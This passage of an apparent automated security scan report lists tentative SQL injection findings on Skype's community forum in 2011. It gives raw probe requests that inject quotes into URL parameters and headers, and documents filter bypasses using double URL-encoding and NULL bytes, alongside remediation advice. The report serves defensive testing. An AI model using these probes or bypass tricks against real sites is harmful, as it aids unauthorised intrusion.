<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Api-access-control-wont-remember/m-p/134242

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 188254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.14. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 253237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.15. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 182769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.16. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 246052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.17. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 9 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
<div class="exception-page-message IncorrectValueFormatException lia-component-content" class="exception-page-message IncorrectValueFormatException">
...[SNIP]...
<li>
           Sorry, your request failed. A notification has been sent to the development team for investigation.<p>
...[SNIP]...

Request 2

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> noptrix.net
...[SNIP]...

1.19. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...

1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/forums/recentpostspage/category-id/English/post-type/message?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id/English/post-type/message?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...

1.21. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/thread [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/thread

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/forums/recentpostspage/category-id'/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 115960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Topics -
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id''/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.22. http://community.skype.com/t5/forums/searchpage/tab/message [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 189840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...

1.23. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/advanced

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id%2527%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.24. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

